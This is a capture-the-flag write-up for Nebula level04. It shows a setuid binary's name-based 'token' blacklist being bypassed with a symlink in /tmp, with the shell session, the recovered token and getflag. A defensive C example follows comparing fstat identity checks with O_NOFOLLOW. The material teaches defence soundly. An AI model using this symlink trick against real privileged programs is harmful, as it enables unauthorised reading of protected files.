In level04 of the Nebula wargame, we are tasked with exploiting the setuid flag04 binary to read a token file that only the flag04 user can open. The source code of the binary is provided.
The strstr() check near the top of main() (the part shown in bold in the original post) is responsible for rejecting any filename argument that contains the string "token". Note that it inspects the argument string only, not the file that is eventually opened.
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
#include <err.h>      /* err() is declared here; the original source omits this include */

int main(int argc, char **argv, char **envp)
{
    char buf[1024];
    int fd, rc;

    if(argc == 1) {
        printf("%s [file to read]\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    /* Name-based blacklist: rejects any argument containing "token".
     * This is the only protection, and it never looks at the file itself. */
    if(strstr(argv[1], "token") != NULL) {
        printf("You may not access '%s'\n", argv[1]);
        exit(EXIT_FAILURE);
    }

    /* open() follows symlinks by default, so argv[1] may resolve to token anyway. */
    fd = open(argv[1], O_RDONLY);
    if(fd == -1) {
        err(EXIT_FAILURE, "Unable to open %s", argv[1]);
    }

    rc = read(fd, buf, sizeof(buf));
    if(rc == -1) {
        err(EXIT_FAILURE, "Unable to read fd %d", fd);
    }

    /* Whatever was read (with flag04's privileges) is echoed to stdout. */
    write(1, buf, rc);
}
The trick is that we can reach the token indirectly, through a symbolic link: the check only sees the string we pass as argv[1], while open(2) follows the link and reads the real file.

level04@nebula:/home/flag04$ ls -l
total 12
-rwsr-x--- 1 flag04 level04 7428 2011-11-20 21:52 flag04
-rw------- 1 flag04 flag04   37 2011-11-20 21:52 token
level04@nebula:/home/flag04$ ./flag04 token
You may not access 'token'
level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/pwn04
level04@nebula:/home/flag04$ ls -l /tmp/pwn04
lrwxrwxrwx 1 level04 level04 18 2012-10-29 04:26 /tmp/pwn04 -> /home/flag04/token
level04@nebula:/home/flag04$ ./flag04 /tmp/pwn04
06508b5e-8909-4f38-b630-fdb148a848a2

That is it! Now we can log in to the flag04 account using the content of token as the password and run getflag.

flag04@nebula:~$ getflag
You have successfully executed getflag on a target account

The open(2) call would have failed (with ELOOP) if the O_NOFOLLOW flag had been passed, but that only rejects a symlink as the final path component and does nothing about a hard link to the same inode, or about a symlink in an earlier directory component. The underlying mistake is checking the name rather than the file: a setuid program that must refuse a particular file should open the path, then compare the opened descriptor's identity (fstat st_dev and st_ino) against the protected file, or better, not open arbitrary user-supplied paths with elevated privileges at all.
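The following program is an added example, not part of the original write-up or of the Nebula source. It places the flag04-style name check (strstr on the argument) beside an object-based check that compares the opened file's device and inode against the protected file, and shows what O_NOFOLLOW does and does not stop. The fixture it builds is constructed for the demo: a temporary directory under /tmp (hypothetical name pwn04demo.XXXXXX) containing a dummy "token" file, a symlink to it and a hard link to it; the function names name_is_blocked, fd_is_protected, nofollow_rejects, make_fixture, remove_fixture and check_alias are the example's own.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* The flag04 check: decide on the path string alone. Any alias of the
 * file (symlink, hard link, another path to the same inode) slips through. */
int name_is_blocked(const char *path)
{
    return strstr(path, "token") != NULL;
}

/* Object-based check: once the file is open, compare what we actually got
 * (device + inode) with the protected file. The caller's spelling of the
 * path is irrelevant, so symlinks and hard links are both caught.
 * Returns 1 if fd refers to the protected file, 0 if not, -1 on fstat error. */
int fd_is_protected(int fd, const struct stat *protected_st)
{
    struct stat st;
    if (fstat(fd, &st) == -1)
        return -1;
    return st.st_dev == protected_st->st_dev && st.st_ino == protected_st->st_ino;
}

/* What O_NOFOLLOW buys: open() fails with ELOOP when the final path
 * component is a symlink. Returns 1 if rejected for that reason, else 0. */
int nofollow_rejects(const char *path)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd == -1)
        return errno == ELOOP;
    close(fd);
    return 0;
}

/* Constructed fixture (hypothetical paths, not the Nebula box): a temp dir
 * holding a dummy "token" file, a symlink to it and a hard link to it. */
struct fixture {
    char dir[64];
    char token[128];
    char symlink_path[128];
    char hardlink_path[128];
};

int make_fixture(struct fixture *f)
{
    strcpy(f->dir, "/tmp/pwn04demo.XXXXXX");
    if (mkdtemp(f->dir) == NULL)
        return -1;
    snprintf(f->token, sizeof f->token, "%s/token", f->dir);
    snprintf(f->symlink_path, sizeof f->symlink_path, "%s/alias", f->dir);
    snprintf(f->hardlink_path, sizeof f->hardlink_path, "%s/hard", f->dir);

    FILE *fp = fopen(f->token, "w");
    if (fp == NULL)
        return -1;
    fputs("constructed-secret-not-a-real-token\n", fp);
    fclose(fp);

    if (symlink(f->token, f->symlink_path) == -1)
        return -1;
    /* Linking a file we own is allowed even with fs.protected_hardlinks=1. */
    if (link(f->token, f->hardlink_path) == -1)
        return -1;
    return 0;
}

void remove_fixture(const struct fixture *f)
{
    unlink(f->hardlink_path);
    unlink(f->symlink_path);
    unlink(f->token);
    rmdir(f->dir);
}

/* Runs both checks against one alias of the protected file. Returns 0 on
 * error; otherwise sets *by_name (strstr verdict) and *by_identity (fstat verdict). */
int check_alias(const char *alias, const char *protected_path, int *by_name, int *by_identity)
{
    struct stat pst;
    if (stat(protected_path, &pst) == -1)
        return 0;
    *by_name = name_is_blocked(alias);
    int fd = open(alias, O_RDONLY);
    if (fd == -1)
        return 0;
    *by_identity = fd_is_protected(fd, &pst);
    close(fd);
    return 1;
}

int main(void)
{
    struct fixture f;
    if (make_fixture(&f) == -1) {
        perror("fixture");
        return 1;
    }
    const char *aliases[] = { f.token, f.symlink_path, f.hardlink_path };
    for (int i = 0; i < 3; i++) {
        int by_name = 0, by_identity = 0;
        if (check_alias(aliases[i], f.token, &by_name, &by_identity))
            printf("%-40s strstr blocks: %d  fstat identity blocks: %d  O_NOFOLLOW rejects: %d\n",
                   aliases[i], by_name, by_identity, nofollow_rejects(aliases[i]));
    }
    remove_fixture(&f);
    return 0;
}
```

Running it shows the pattern from the write-up in miniature: the strstr check blocks only the path that literally contains "token", the symlink and the hard link pass it, while the device/inode comparison flags all three. O_NOFOLLOW rejects the symlink but accepts the hard link, which is why it is a partial fix at best.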